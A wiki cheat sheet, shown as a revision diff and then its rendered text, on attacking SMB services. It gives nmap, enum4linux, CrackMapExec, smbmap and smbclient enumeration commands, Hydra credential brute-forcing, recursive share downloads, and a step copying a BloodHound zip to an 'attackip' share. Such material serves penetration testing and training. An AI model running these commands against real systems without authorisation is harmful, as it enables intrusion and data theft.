No edit summary |
|||
(6 intermediate revisions by 3 users not shown) | |||
Line 1: | Line 1: | ||
SMB | ==Description == | ||
SMB stands for Server Message Block. Default ports are 445, 139. | |||
Ok what does it do? Glad you asked. | |||
It allows clients, like workstations, to communicate with a server like a share directory. | |||
==Enumeration== | |||
=== Nmap === | |||
Automatic enumeration can be done with [[Nmap]] like so. Pay attention here the port may be different but no all the time and of course the ip will be different. | |||
<syntaxhighlight lang="bash"> | |||
nmap --script smb-brute -p 445 <target-ip> | |||
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip> | nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip> | ||
nmap --script smb-enum* -p 445 <target-ip> | nmap --script smb-enum* -p 445 <target-ip> | ||
nmap --script smb-protocols -p 445 <target-ip> | nmap --script smb-protocols -p 445 <target-ip> | ||
nmap --script smb-vuln* -p 445 <target-ip> | nmap --script smb-vuln* -p 445 <target-ip> | ||
</syntaxhighlight> | |||
=== Enum4Linux === | |||
[[Enum4Linux]] enumerates the users, share directories, etc. | |||
<syntaxhighlight lang="bash"> | |||
enum4linux <target-ip> # Basic use. | |||
enum4linux -a <target-ip> # All Enum. | |||
enum4linux -v <target-ip> # Verbose. | |||
enum4linux <target-ip> | |||
# | #Specify username and password this can get us even more information as we will have accessed that users share. | ||
enum4linux - | enum4linux -u username -p password <target-ip> | ||
</syntaxhighlight> | |||
# | === CrackMapExec === | ||
[[CrackMapExec]] enumerates the users, share directories, etc. | |||
<syntaxhighlight lang="powershell"> | |||
# Enumerate shares with credentials | |||
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --shares | |||
# | # Enumerate shares anonymously | ||
crackmapexec smb 10.10.10.10 -u 'a' -p '' --shares | |||
</syntaxhighlight> | |||
=== SMB Map === | |||
<syntaxhighlight lang="bash"> | |||
smbmap -H <target-ip> | smbmap -H <target-ip> | ||
smbmap -H <target-ip> -R # Recursive lookup. | |||
smbmap -H <target-ip> -R | |||
#Username and | # Username and Password | ||
smbmap -u username -p password -H <target-ip> | smbmap -u username -p password -H <target-ip> | ||
#Execute a command | # Execute a command | ||
smbmap -u username -p password -H <target-ip> -x 'ipconfig' | smbmap -u username -p password -H <target-ip> -x 'ipconfig' | ||
</syntaxhighlight> | |||
=== SMBClient === | |||
Connect with smbclient | |||
<syntaxhighlight lang="bash"> | |||
smbclient -L 10.0.0.1 | |||
smbclient -N -L 10.0.0.1 | |||
smbclient -N -L \\\\10.0.0.1 | |||
smbclient -L 10.0.0.1 -U username | smbclient -L 10.0.0.1 -U username | ||
smbclient //10.0.0.1/somedir -N | smbclient //10.0.0.1/somedir -N | ||
# | # use of "" | ||
smbclient //10.0.0.1/ | smbclient "//10.0.0.1/some dir" -N | ||
#Specify | # Specify shared directory | ||
smbclient | smbclient //10.0.0.1/somedir -U username | ||
# Specify workgroup | |||
smbclient -L 10.0.0.1 -W WORKGROUP -U username | |||
</syntaxhighlight> | |||
== Brute Force == | |||
=== Brute Force Credentials === | |||
[[Hydra]] | |||
<syntaxhighlight lang="bash"> | |||
hydra -l username -P passwords.txt <target-ip> smb | |||
hydra -L usernames.txt -p password <target-ip> smb | hydra -L usernames.txt -p password <target-ip> smb | ||
</syntaxhighlight> | |||
== Basic Commands == | |||
Once Connected we can find sensitive files or information and we love that as hackers dont we. | Once Connected we can find sensitive files or information and we love that as hackers dont we. | ||
<syntaxhighlight lang="bash"> | |||
List Files | #List Files | ||
smb> ls | smb> ls | ||
Download a file | # Download a file | ||
smb> get sample.txt | smb> get sample.txt | ||
Put a file can be txt,pdf,php etc.. | # Put a file can be txt,pdf,php etc.. | ||
smb> put sample.txt | smb> put sample.txt | ||
Download files recursively | # Download files recursively below | ||
smb> mask "" | smb> mask "" | ||
smb> recurse ON | smb> recurse ON | ||
Line 189: | Line 111: | ||
smb> mget * | smb> mget * | ||
We can use smbget from our local machine as well | # We can use smbget from our local machine as well | ||
smbget -R smb://<target-ip>/somedir -U username | |||
smbget -R smb://<target-ip>/somedir -U username | |||
# Specify work group | |||
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username | smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username | ||
# As anonymous user | |||
smbget smb://<target-ip>/somedir -U anonymous password: anonymous | |||
# Transfer a file from windows to my attacker machine | |||
# In your local kali make a directory that you want that file to go into. | |||
mk dir smb | |||
# Next we will run impacket-smbserver | |||
sudo impacket-smbserver -smb2support share $(pwd) | |||
#Then we will transfer the file over to that share we just set up with impacket-smbserver. | |||
powershell copy bloodhound.zip \\attackip\share\ | |||
# I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD. | |||
smbclient -N -L //<FQDN/IP> Null session authentication on SMB. | |||
smbclient //<FQDN/IP>/<share> Connect to a specific SMB share. | |||
rpcclient -U "" <FQDN/IP> Interaction with the target using RPC. | |||
samrdump.py <FQDN/IP> Username enumeration using Impacket scripts. | |||
smbmap -H <FQDN/IP> Enumerating SMB shares. | |||
crackmapexec smb <FQDN/IP> --shares -u '' -p '' Enumerating SMB shares using null session authentication. | |||
enum4linux-ng.py <FQDN/IP> -A SMB enumeration using enum4linux. | |||
</syntaxhighlight> |
Latest revision as of 12:37, 8 July 2023
Description
SMB stands for Server Message Block. Default ports are 445, 139.
Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory.
Enumeration
Nmap
Automatic enumeration can be done with Nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.
nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>
Enum4Linux
Enum4Linux enumerates the users, share directories, etc.
enum4linux <target-ip> # Basic use.
enum4linux -a <target-ip> # All Enum.
enum4linux -v <target-ip> # Verbose.
#Specify username and password this can get us even more information as we will have accessed that users share.
enum4linux -u username -p password <target-ip>
CrackMapExec
CrackMapExec enumerates the users, share directories, etc.
# Enumerate shares with credentials
crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --shares
# Enumerate shares anonymously
crackmapexec smb 10.10.10.10 -u 'a' -p '' --shares
SMB Map
smbmap -H <target-ip>
smbmap -H <target-ip> -R # Recursive lookup.
# Username and Password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
SMBClient
Connect with smbclient
smbclient -L 10.0.0.1
smbclient -N -L 10.0.0.1
smbclient -N -L \\\\10.0.0.1
smbclient -L 10.0.0.1 -U username
smbclient //10.0.0.1/somedir -N
# use of ""
smbclient "//10.0.0.1/some dir" -N
# Specify shared directory
smbclient //10.0.0.1/somedir -U username
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username
Brute Force
Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb
Basic Commands
Once Connected we can find sensitive files or information and we love that as hackers dont we.
#List Files
smb> ls
# Download a file
smb> get sample.txt
# Put a file can be txt,pdf,php etc..
smb> put sample.txt
# Download files recursively below
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *
# We can use smbget from our local machine as well
smbget -R smb://<target-ip>/somedir -U username
# Specify work group
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
# As anonymous user
smbget smb://<target-ip>/somedir -U anonymous password: anonymous
# Transfer a file from windows to my attacker machine
# In your local kali make a directory that you want that file to go into.
mk dir smb
# Next we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)
#Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\
# I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
smbclient -N -L //<FQDN/IP> Null session authentication on SMB.
smbclient //<FQDN/IP>/<share> Connect to a specific SMB share.
rpcclient -U "" <FQDN/IP> Interaction with the target using RPC.
samrdump.py <FQDN/IP> Username enumeration using Impacket scripts.
smbmap -H <FQDN/IP> Enumerating SMB shares.
crackmapexec smb <FQDN/IP> --shares -u '' -p '' Enumerating SMB shares using null session authentication.
enum4linux-ng.py <FQDN/IP> -A SMB enumeration using enum4linux.